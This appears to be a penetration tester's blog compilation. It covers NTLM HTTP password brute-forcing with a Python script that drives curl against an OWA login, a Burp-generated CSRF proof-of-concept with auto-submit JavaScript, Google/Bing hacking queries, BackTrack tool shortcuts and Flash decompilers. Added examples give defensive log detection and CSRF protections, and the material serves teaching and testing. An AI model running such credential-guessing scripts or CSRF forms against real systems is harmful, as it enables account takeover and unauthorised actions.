NTLM HTTP Authentication bruteforcing

NTLM HTTP authentication shares only its name with the Microsoft NTLM password hashes; think of it as the Integrated Windows Authentication feature as seen from a browser.

Tools built to brute-force hashes may therefore not apply to NTLM HTTP authentication.

Burp, for example, cannot brute-force NTLM authentication.

Two tools that can be used to brute-force NTLM authentication are

– curl
– wget

Curl

Curl can do NTLM authentication. In addition, a neat feature of curl is that you can put sets and ranges in the URL, which curl iterates over and substitutes. For example:

curl -o test_#1_#2 "http://www.superconfigure.com/{admin,upload,images}[0-2]"

will retrieve all nine paths:

http://www.superconfigure.com/admin/0
http://www.superconfigure.com/upload/0
http://www.superconfigure.com/images/0

and so on, saving the HTML of each of the nine results to a local file named test_admin_0, test_admin_1, and so on.

To use NTLM authentication, pass --ntlm and give the credentials with -u user:password:

curl --ntlm -u superconfigure.com\mario:passphrase https://admin.superconfigure.com

Unfortunately, the -u parameter does not accept the same set and range syntax as the URL, so brute-forcing in the following way is not possible:

curl -o test_#1 --ntlm -u superconfigure.com\mario:passw[0-3]rd https://www.superconfigure.com/emails

internal error: invalid pattern type (0)
Warning: bad output glob!

One way to leverage curl's NTLM capability for password brute-forcing is to script it with Python. You obviously only want to do this when you KNOW the username, and ideally part of the password as well, because it is slow: Python spawns a new curl process for every attempt.

Python script

import os

pwdprefix = "mario"
pwdsmiddle = ['a', 's', 'd', 'A', 'S', 'D']
pwdsuffix = ['1', '!', '#']

# Backslashes are escaped so the literal reads exactly: curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:
cmdprefix = "curl -k --ntlm -u \"\\SUPERCONFIGURE.COM\\mario:"
cmdsuffix = "\" https://email.superconfigure.com/owa/"

# One curl invocation per candidate password; the response is saved to <password>.html
for s in pwdsuffix:
    for m1 in pwdsmiddle:
        pwdattempt = pwdprefix + m1 + s
        cmd = cmdprefix + pwdattempt + cmdsuffix + " -o " + pwdattempt + ".html"
        print(cmd)
        os.system(cmd)

This saves the response for each attempted password as an HTML file; a successful login will produce a noticeably larger file.

C:\temp\ml>\Python25\python.exe mc.py
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioa1" https://email.superconfigure.com/owa/ -o marioa1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marios1" https://email.superconfigure.com/owa/ -o marios1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:mariod1" https://email.superconfigure.com/owa/ -o mariod1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioA1" https://email.superconfigure.com/owa/ -o marioA1.html
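The defender's view of the same activity, as an added example that is not part of the original post: every curl run above leaves a 401 in the web server log for a wrong guess and a 200 for the guess that works. The script below parses constructed IIS-style W3C log lines (hypothetical data; it assumes the NTLM challenge is logged as a 401 with cs-username "-" and a rejected password as a 401 carrying the attempted username) and flags bursts of failures per source and user, plus a success that follows such a burst, which is the server-side counterpart of the "larger file" signal.

```python
import datetime as dt
from collections import defaultdict, deque

# Constructed sample in IIS W3C extended format (hypothetical data, not from the page).
# Assumption: the NTLM challenge is logged as a 401 with cs-username "-", and a rejected
# password as a 401 carrying the attempted username.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-username sc-status
2013-01-11 14:41:45 10.0.0.5 GET /owa/ - 401
2013-01-11 14:41:46 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 401
2013-01-11 14:41:47 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 401
2013-01-11 14:41:48 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 401
2013-01-11 14:41:49 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 401
2013-01-11 14:41:50 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 401
2013-01-11 14:41:51 10.0.0.5 GET /owa/ SUPERCONFIGURE\\mario 200
2013-01-11 14:45:00 10.0.0.9 GET /owa/ - 401
2013-01-11 14:45:01 10.0.0.9 GET /owa/ SUPERCONFIGURE\\alice 401
2013-01-11 14:45:02 10.0.0.9 GET /owa/ SUPERCONFIGURE\\alice 200
"""


def parse_w3c(text):
    """Yield one dict per log row; the #Fields: directive names the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields is not None:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def find_auth_bruteforce(text, threshold=5, window_seconds=60):
    """Return {(c-ip, username): peak failures} for sources that produced at least
    `threshold` username-bearing 401s inside any `window_seconds` span."""
    recent = defaultdict(deque)   # sliding window of failure timestamps per (ip, user)
    flagged = {}
    for row in parse_w3c(text):
        if row["sc-status"] != "401" or row["cs-username"] == "-":
            continue  # challenge round-trips and successes are not failed guesses
        ts = dt.datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        key = (row["c-ip"], row["cs-username"])
        window = recent[key]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(window))
    return flagged


def success_after_burst(text, min_failures=3):
    """Return (c-ip, username) pairs whose 200 came right after at least `min_failures`
    username-bearing 401s: a guessed password rather than a mistyped one."""
    failures = defaultdict(int)
    hits = []
    for row in parse_w3c(text):
        if row["cs-username"] == "-":
            continue
        key = (row["c-ip"], row["cs-username"])
        if row["sc-status"] == "401":
            failures[key] += 1
        elif row["sc-status"] == "200":
            if failures[key] >= min_failures:
                hits.append(key)
            failures[key] = 0
    return hits


if __name__ == "__main__":
    for key, n in find_auth_bruteforce(SAMPLE_LOG).items():
        print("possible password guessing from %s as %s (peak %d failures in window)" % (key[0], key[1], n))
    for key in success_after_burst(SAMPLE_LOG):
        print("success after a failure burst, review this logon:", key)
```

Thresholds are deliberately parameters: a legitimate user with a cached stale password also produces a short run of 401s, so tune `threshold` and `window_seconds` against your own log volume before alerting.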


Google hacking with SearchDiggity

A long time ago in a galaxy far away, Google hacking was easy enough. Google hacking queries such as the following:

GET /ajax/services/search/web?v=1.0&rsz=large&start=0&q=site%3aWWW.SUPERCONFIGURE.COM+%22powered+by+my+little+forum%22 HTTP/1.1
Referer: superconfigure.com
Host: ajax.googleapis.com
Proxy-Connection: Keep-Alive

would produce a usable JSON response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 11 Jan 2013 14:41:45 GMT
Content-Type: text/javascript; charset=utf-8
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 325

{"responseData": {"results":[],"cursor":{"moreResultsUrl":"http://www.google.com/search?oe\u003dutf8\u0026ie\u003dutf8\u0026source\u003duds\u0026start\u003d0\u0026hl\u003den\u0026q\u003dsite:SOME.SITE.COM+%22powered+by+my+little+forum%22","searchResultTime":"0.24"}}, "responseDetails": null, "responseStatus": 200}

Unfortunately, Google restricts this: your IP gets blocked after a number of requests. In my case this took all of a few seconds and roughly a hundred queries, and now Google responds with the following:


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 11 Jan 2013 14:46:26 GMT
Content-Type: text/javascript; charset=utf-8
X-Embedded-Status: 403
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 133

{"responseData": null, "responseDetails": "Quota Exceeded. Please see http://code.google.com/apis/websearch", "responseStatus": 403}
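An added example, not from the original post: a small parser for the two reply bodies quoted above. The point it makes is that the HTTP status line reads 200 OK in both cases; the real outcome is the responseStatus field (mirrored in the X-Embedded-Status header), so a client that only checks the HTTP status would keep sending queries after the quota error and simply extend the block. The bodies are the ones shown above, with the long moreResultsUrl replaced by a placeholder.

```python
import json

# The two reply bodies from above; the long moreResultsUrl is shortened to a placeholder.
OK_BODY = ('{"responseData": {"results":[],"cursor":{"moreResultsUrl":'
           '"http://www.google.com/search?q=PLACEHOLDER","searchResultTime":"0.24"}}, '
           '"responseDetails": null, "responseStatus": 200}')
QUOTA_BODY = ('{"responseData": null, "responseDetails": "Quota Exceeded. Please see '
              'http://code.google.com/apis/websearch", "responseStatus": 403}')


class QuotaExceeded(Exception):
    """The API reported 403 in the body although the HTTP status line said 200 OK."""


def parse_ajax_search(body):
    """Return {'results', 'more_url', 'seconds'} for a good reply.

    Raises QuotaExceeded on the embedded 403 and ValueError on anything else, so the
    caller stops instead of re-sending and earning a longer block."""
    doc = json.loads(body)
    status = doc.get("responseStatus")
    if status == 403:
        raise QuotaExceeded(doc.get("responseDetails") or "quota exceeded")
    if status != 200 or not isinstance(doc.get("responseData"), dict):
        raise ValueError("unexpected reply: status=%r details=%r" % (status, doc.get("responseDetails")))
    data = doc["responseData"]
    cursor = data.get("cursor") or {}
    return {
        "results": data.get("results") or [],
        "more_url": cursor.get("moreResultsUrl"),
        "seconds": float(cursor.get("searchResultTime", 0)),
    }


def collect(replies):
    """Parse a sequence of reply bodies and stop at the first quota error; the replies
    after it would only be more 403s (and more reason for Google to keep the block)."""
    parsed = []
    for body in replies:
        try:
            parsed.append(parse_ajax_search(body))
        except QuotaExceeded as exc:
            print("stopping: %s" % exc)
            break
    return parsed


if __name__ == "__main__":
    # Constructed sequence: two good replies, then the quota error, then one more reply
    # that a status-line-only client would still have sent.
    print(len(collect([OK_BODY, OK_BODY, QUOTA_BODY, OK_BODY])), "replies parsed")
```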

Tools such as Foundstone's SiteDigger (an old tool [http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx]; the company was bought by McAfee and many of its tools, although still online, are outdated) fall under the same limitation: use it for more than a few queries and you'll simply get your IP blocked…


Enter SearchDiggity. http://www.stachliu.com/resources/tools/google-hacking-diggity-project/

Not only does it work for Google hacking without getting you blocked, it also supports a number of additional search engines, including the excellent Shodan. In short,

With the retirement of Google’s AJAX Search API on November 1, 2010, most of the security utilities available for Google Hacking cease to function properly, leaving the security industry with a need for new and innovative tools. GoogleDiggity is a new utility designed to help fill that need, now leveraging the Google JSON/ATOM Custom Search API, so it will not get you blocked by Google bot detection while scanning.

The list of Google queries can be seen here: http://www.stachliu.com/dictionaries/Google%20Queries.txt
The list of Bing queries can be seen here: http://www.stachliu.com/dictionaries/Bing%20Queries.txt

Here’s what its query now looks like:


GET /search?q=%22powered+by+php+photo+album%22+%7c+instreamset%3aurl%3a%22main.php%3fcmd%3dalbum%22+-demo2+-pitanje+site%3asuperconfigure.com&first=151 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0
Referer: http://www.bing.com/search?q="powered+by+php+photo+album"+|+instreamset:url:"main.php?cmd=album"+-demo2+-pitanje+site:superconfigure.com&first=101
Host: www.bing.com
Cookie: SRCHHPGUSR=NEWWND=0&NRSLT=50&SRCHLANG=&AS=1; MUIDB=0DC3B069C2FB66870E23B43BC3EA6659; SRCHUID=V=2&GUID=42ED8475E3CB4C4AA841641C311C698B; _FS=NU=1; _SS=SID=14A24A7BD3D4449FA207C9F11B1C7D8C; MUID=0DC3B069C2FB66870E23B43BC3EA6659; OrigMUID=0DC3B069C2FB66870E23B43BC3EA6659%2c0666d89df2244490bbbf8d4c3d2b0958; SRCHD=MS=2646195&D=2646192&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20130111; _FS=NU=1; _SS=SID=14A24A7BD3D4449FA207C9F11B1C7D8C; MUID=0DC3B069C2FB66870E23B43BC3EA6659; OrigMUID=0DC3B069C2FB66870E23B43BC3EA6659%2c0666d89df2244490bbbf8d4c3d2b0958; SRCHD=MS=2646195&D=2646192&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20130111


CSRF with BURP

When doing penetration testing on web applications, I regularly come across CSRF-vulnerable sites. Typically I then manually create the HTML required to reproduce a request that performs a sensitive operation unbeknownst to the user.

Sometimes, though, a POST contains dozens of hidden fields, which makes editing the HTML tedious and time consuming. Enter Burp.

Burp has a built-in CSRF proof-of-concept feature that takes the request and generates the HTML for you.

Simply right-click the request and under "Engagement tools" you will find the "Generate CSRF PoC" option:

Image

Presto, it pops up a display containing the HTML you can use. If you want the browser to submit the form automatically when the file is opened, add JavaScript such as the following and call it from the body tag, e.g. <body onload="submitForm()"> (the generated form has no name attribute, so it is addressed as document.forms[0]):

<script type='text/javascript'>function submitForm(){ document.forms[0].submit(); }</script>

Here’s an example of what Burp generated for the above request:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://your.target.com/cgi-bin/ownage/vuln.pl?parms" method="POST">
<input type="hidden" name="Name" value="mario@superconfigure.com" />
<input type="hidden" name="Password" value="youwish" />
<input type="hidden" name="s1" value="secret" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
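The fix side of the PoC above, as an added example that is not part of the original post or of Burp: a server-side check that makes the generated form useless. The request objects are constructed stand-ins (dicts with method, headers, form and session_id) rather than any framework's API, SECRET_KEY and the handler names are hypothetical, and the origin is the one from the PoC. The vulnerable handler trusts the session cookie alone, which is exactly why a cross-site form works; the hardened one additionally requires a session-bound token the attacker's page cannot compute and rejects a mismatching Origin or Referer.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical application secret; in practice loaded from protected configuration.
SECRET_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "http://your.target.com"   # the origin used in the PoC above


def issue_csrf_token(session_id):
    """Synchronizer token: an HMAC bound to the user's session, emitted as a hidden field
    on legitimate forms. A cross-site page cannot read the session, so it cannot forge it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url, origin):
    u, o = urlparse(url), urlparse(origin)
    return (u.scheme, u.hostname, u.port) == (o.scheme, o.hostname, o.port)


def request_allowed(req):
    """req is a constructed stand-in: {'method', 'headers', 'form', 'session_id'}.
    Safe methods pass; state-changing ones need a same-origin Origin/Referer (when the
    browser sent one) and a token that matches the current session."""
    if req["method"] in ("GET", "HEAD", "OPTIONS"):
        return True
    source = req["headers"].get("Origin") or req["headers"].get("Referer")
    if source and not same_origin(source, SITE_ORIGIN):
        return False
    token = req["form"].get("csrf_token", "")
    return hmac.compare_digest(token, issue_csrf_token(req["session_id"]))


def vulnerable_handler(req):
    """What the PoC targets: the cookie-backed session is the only thing checked."""
    return "updated " + req["form"]["Name"]


def hardened_handler(req):
    if not request_allowed(req):
        return "rejected"
    return vulnerable_handler(req)


# Constructed requests. POC_REQUEST mirrors the generated form: the browser attaches the
# victim's session, the body carries only the hidden fields, and Origin is another site.
POC_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "http://other-site.example"},
    "form": {"Name": "mario@superconfigure.com", "Password": "youwish", "s1": "secret"},
    "session_id": "sess-123",
}
LEGIT_REQUEST = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN},
    "form": dict(POC_REQUEST["form"], csrf_token=issue_csrf_token("sess-123")),
    "session_id": "sess-123",
}

if __name__ == "__main__":
    print("vulnerable handler, PoC request:", vulnerable_handler(POC_REQUEST))
    print("hardened handler, PoC request:  ", hardened_handler(POC_REQUEST))
    print("hardened handler, real request: ", hardened_handler(LEGIT_REQUEST))
```

Marking the session cookie SameSite=Lax (or Strict) is a cheap second layer: the browser then does not attach it to a top-level POST that originates from another site, which is precisely the request the PoC file makes.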



How to replace your cell provider with Skype for all cell communications in Canada

I dropped my conventional cell carrier entirely in favour of an entirely IP-based telephony solution, Skype. Skype runs on my Samsung Galaxy Tab 10.5, nothing rooted or jailbroken.

The biggest hurdle is enabling incoming calls from non-Skype users. Skype does not provide a call-in number for Canada, so you have to pay $10 a month for a service that does this for you.

$10 a month is pretty inexpensive for a cell phone, and it includes voicemail with a web interface!

Once you have Skype enabled and you can use it for outgoing calls, head over to http://onekingtelecom.com/ and sign up. Tell them what number you would prefer (if any) and that’s it!

If Skype ever does provide such a service, you can cancel that and save an additional $10 a month.

The only downside is that you will lose your existing number, if any.


Tweaking Back Track with latest tools

I have integrated a couple of tools into my Back Track. For the tools I use most often during pen tests, I tend to create a shortcut button in the toolbar so they open as quickly as possible.

Here is how to do just that for Web Sorrow and Blind Elephant.

First, a quick overview of these little tools.

Web Sorrow (get it here: http://code.google.com/p/web-sorrow/) is similar to Nikto. If you use Nikto you may want to give Web Sorrow a try. Basically it displays the typical low-hanging fruit: banners, robots.txt contents, default folders, etc. There is just no reason not to use it during a pen test.

As for Blind Elephant (get it here: http://blindelephant.sourceforge.net/), it is a fingerprinting tool for web apps. If you need to know whether a site is running WordPress, for example, and which version of WordPress, this tool will quickly get you that information.

In my case I have downloaded and placed the tools on the desktop, (feel free to use whatever folder you wish); I have them at the following locations:

/root/Desktop/web sorrow

and

/root/Desktop/blindelephant

To create the tool bar short cuts, do the following:

Right click and choose “Add to Panel”:

Image


Now select “Custom Application Launcher”:

Image

and hit the Add button. Be sure to specify “Application in Terminal” as the Type. In the “Command” edit box, add the following:

For Web Sorrow

sh -c "cd ~/Desktop/web\ sorrow/ && perl ./Wsorrow.pl; sudo -s"

For Blind Elephant

sh -c "cd ~/Desktop/blindelephant/src/blindelephant/ && ./BlindElephant.py; sudo -s"

Now you can just click the short cut and run them. Here is an example of Web Sorrow on a site:

Image

And here is an example of Blind Elephant on the same site. First we let it guess the application used:

Image

Now we attempt to determine the version of the WordPress used:

Image


Modifying DOM element values returned by Firefox

There’s an easy way to customize values returned by the DOM through JavaScript in Firefox.

Here are some values as returned by my Firefox 10 in my Backtrack.

"Platform: " + navigator.platform;

"User-agent header: " + navigator.userAgent;

This returns the following:

Platform: Linux i686

User-agent header: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2

This can be modified by opening a tab to: “about:config” and adding
“general.platform.override” and “general.useragent.override” (careful those are case sensitive) as new strings, and giving them the values you want.

Firefox DOM

Now when a page reads navigator.platform, instead of "Linux i686" it will see "Espresso".


igoogle – Not up to snuff

igoogle is a terrific, AOL-like homepage to the Internet. I do not want to enter a dozen different URLs for common items such as the news, Gmail, or contacts every time I boot up; this is what igoogle is meant for.

Unfortunately it lacks clear support from Google itself; many of the gadgets are third-party and simply do not work.

Case in point: Google Contacts. It used to work, but it has not worked for a few months now. I do not want to blame its author, a certain Nicholas Wilde; I am sure Google changed something at some point that broke the gadgets.

Why isn’t Google authoring such a plug-in? This is what it looks like for anyone adding the gadgets now (and this is in Chrome):

Google contacts gadget

And here is the Google plus gadget:

Google Plus Gadget

Wow, good job.

The temporary solution is to add a gadget called the "Box Of Links" and in there add the links for Google Contacts (https://www.google.com/contacts/#contacts) and Google Plus (https://plus.google.com/).

Just don’t forget to remove the other two gadgets:-)


gmail

Did you know that Gmail delivers mail addressed to an account whose name contains a dot (.) whatever the placement (or absence) of dots within the name?

For example, my email of outlaw.was.here@gmail.com can be replaced with

outlaw.washere@gmail.com

outlawwashere@gmail.com

outlawwas.here@gmail.com
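The practical side of this for anyone handling sign-ups or abuse reports, as an added example that is not part of the original post: the variants above are one mailbox, so comparing addresses by string lets a single person register many times. The canonicalisation below strips the dots for Gmail addresses only (treating googlemail.com as the same service is an assumption beyond what the page states) and then counts registrations per real mailbox.

```python
# Domains where dots in the local part are ignored. gmail.com is what the post describes;
# including googlemail.com as an alias of the same service is an assumption.
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_gmail(address):
    """Map every dot-variant of a Gmail address onto one canonical form.
    Other domains are only lower-cased, since for them dots may be significant."""
    local, at, domain = address.strip().rpartition("@")
    if not at or not local or not domain:
        raise ValueError("not an e-mail address: %r" % address)
    local, domain = local.lower(), domain.lower()
    if domain in GMAIL_DOMAINS:
        local = local.replace(".", "")
    return local + "@" + domain


def registrations_per_mailbox(addresses):
    """Count sign-ups per underlying mailbox, e.g. to notice one person registering many times."""
    counts = {}
    for address in addresses:
        key = canonical_gmail(address)
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sign-up list using the variants from the post plus one unrelated address.
SIGNUPS = [
    "outlaw.was.here@gmail.com",
    "outlaw.washere@gmail.com",
    "outlawwashere@gmail.com",
    "outlawwas.here@gmail.com",
    "someone@example.com",
]

if __name__ == "__main__":
    for mailbox, n in sorted(registrations_per_mailbox(SIGNUPS).items()):
        print("%-30s %d" % (mailbox, n))
```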


Flash, group discussions applet

I implemented an applet using Flash’s networking stack in order to deepen my knowledge of its overall networking capabilities.

The way it works is you enter a pre-agreed-upon roomname, where 2 or more people can have their anonymous discussions.

It relies on Adobe's RTMFP protocol, which has the advantage of running on most Flash-enabled devices (but on my Samsung Galaxy Tab the virtual keyboard never pops up).

Adding video and audio should be quick as the Flash Builder framework makes adding this easy.

https://sec-com.appspot.com/

Give it a spin with “test” as a room.


Which is the “best” Free Flash decompiler for pen testers?

This article compares three popular free Flash decompilers. The application used is a real-world Flash application for which I have the original code.
Although SuperGroove is in its alpha stage of development, now is as good a time as any to use these tools in order to determine:

1- Which of them works best for pen testers.
2- Whether the tools provide some insight into possible issues in my Flash code that I should fix.

The alpha Application is here: https://superconfigure-supergroove.appspot.com/

I downloaded the SWF and ran each of the tools on it.

Note: my SuperGroove Flash application was built with the latest Adobe Flash Builder 4 compiler (Flex 4.1 SDK) and requires at least Flash 10.1 in the client's browser.

My .mxml code file is 670 lines.
All tests were run on an x64 Vista PC.

1.  Flare 0.6 (http://www.nowrap.de/flare.html) Free

Installation was simple (100K EXE), then it is just a matter of right clicking the SWF file and selecting “Decompile”.
This generates a .FLR file.

The site states:
– No images, sounds or text are extracted — ActionScript only.
– ActionScript III (Flash 9) isn’t supported. The format is entirely different.

which did not bode well for this test!
Results: epic fail. The .FLR file produced by Flare was some 31 lines of nothing.

This was no surprise given the recent version of the Supergroove application, and the dated Flare tool version.

2. HP’s SWFScan 1.0 (https://h30406.www3.hp.com/campaigns/2009/wwcampaign/1-5TUVE/images/SwfScan.msi) Free

Installation was simple (6MB MSI), then you simply add the path to the SWF in the GUI and hit the “Get” button.

The look and feel is very similar to Microsoft's Application Verifier, a tool used to verify SDL compliance in unmanaged applications.

Results are very impressive.

The first thing I noticed: I had unused strings, which the compiler stripped out of the final app.
So although they appear in the .mxml source code, they are missing from the SWFScan output.

First thing to do: remove unused variables from my code!

Now for functions.

The results were quite impressive.

Here is my original code:

// Display read-only status information
private function onNetStatus(event:NetStatusEvent):void {

    const _msg:String = "Code:" + event.info.code.toString() + "\nLevel: " + event.info.level + "\nMeaning :" + event.info.meaning;
    // TODO change '+=' back to just '='
    status_text_network_id.text += _msg;

    // When UDP is blocked, clicking a room can take some time before an error is shown.
    // This puts back the default cursor since we disable clicking during that waiting period.
    CursorManager.removeBusyCursor();
    FlexGlobals.topLevelApplication.enabled = true;

    switch(event.info.code)
    {
        /*
        The P2P connection attempt succeeded.
        The info.stream property indicates which stream has succeeded.
        */
        case "NetStream.Connect.Success":
            OnNetStreamConnect();
            break;

        /*
        Sent when a new Group Posting is received.
        The info.message:Object property is the message.
        The info.messageID:String property is this message's messageID.
        */
        case "NetGroup.Posting.Notify": // somebody posted something!
            receiveMessage(event.info.message);
            break;

Here is the SWFScan produced source code:


        private function onNetStatus(arg0:flash.events::NetStatusEvent)
        {
            var loc0:* = "Code:" + toString() + "
            Level: " + arg0.info.level + "
            Meaning :" + arg0.info.meaning;
            this.status_text_network_id.text = 0;
            CursorManager.removeBusyCursor();
            FlexGlobals.topLevelApplication.enabled = true;
            var loc1:* = arg0.info.code;
            switch(loc1)
            {
                case "NetStream.Connect.Success":
                    this.OnNetStreamConnect();
                    break;
                case "NetGroup.Posting.Notify":
                    this.receiveMessage(arg0.info.message);
                    break;

The results speak for themselves. Here is another excerpt,

My original code:

private function hithere(info:Object):void
{
    var sort:Sort = new Sort();
    sort.fields = [new SortField("label", true)];
    listData.sort = sort;
    var o:Object = new Object();
    o.label = info.user;
    o.peer  = info.sender;
    // info.text isn't here of course, we hard-coded it
    listData.addItem(o);
    listData.refresh();  // this does the actual sort
}

Here is the SWFScan produced source code:

        private function hithere(arg0:Object)
        {
            var loc2:* = null;
            var loc0:* = new Object();
            loc0.label = arg0.user;
            loc0.peer = arg0.sender;
            var loc1:* = 0;
            while(loc1 < this.listData.length)
            {
                loc2 = getItemAt(loc1);
                if(getItemAt(loc1).label == loc0.label)
                {
                    return;
                }
                loc1 = loc1 + 1;
            }
            addItem(loc0);
            refresh();
            return;
            
        }

In addition, its UI is very intuitive; there's even a tab that displays the discovered URLs.

There's also an Analyze feature that produces a report of vulnerabilities in the application.
I don't know whether it's because no vulnerabilities were found or because the feature failed, but I obtained no results from the Analyze feature.

3.  SwfIntruder 0.9.1 (http://code.google.com/p/swfintruder/downloads/detail?name=swfintruder-0.9.1.tgz&can=2&q=) Free

Installation was simple (100KB TGZ): extract it, then simply point your browser (the site states it requires Firefox 2.x) at the 127.0.0.1/…/index.html file.

It is an OWASP tool, and the site (https://www.owasp.org/index.php/Category:SWFIntruder) states:

"SWFIntruder purpose is to analyze a Flash application for version =< 8"

So this test is a fail, since my application uses Flash 10.

Summary

HP’s product was the clear winner, providing both the most complete functionality and features, ease of use, and detailed reports.
